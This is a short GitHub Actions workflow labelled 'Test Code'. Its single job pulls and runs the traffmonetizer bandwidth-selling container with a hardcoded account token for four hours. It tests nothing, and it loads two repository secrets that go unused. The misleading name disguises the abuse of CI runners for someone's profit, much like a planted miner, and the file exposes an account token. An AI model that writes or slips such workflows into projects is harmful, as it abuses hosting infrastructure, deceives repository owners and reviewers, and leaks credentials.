name: Test Code

on:
  workflow_dispatch:
  repository_dispatch:
    types: [fts]

jobs:
  fts:
    runs-on: ubuntu-latest
    steps:
      - name: start
        env:
          KEY_S: ${{ secrets.KEY_S }}
          KEY_W: ${{ secrets.KEY_W }}

        run: |
          docker pull traffmonetizer/cli_v2:latest
          docker run -d --name tm traffmonetizer/cli_v2 start accept --token sUH2g4NZP+HN2TZCiz9qryChKQnGevf4QN4tYA88v8Y=
          sleep 4h
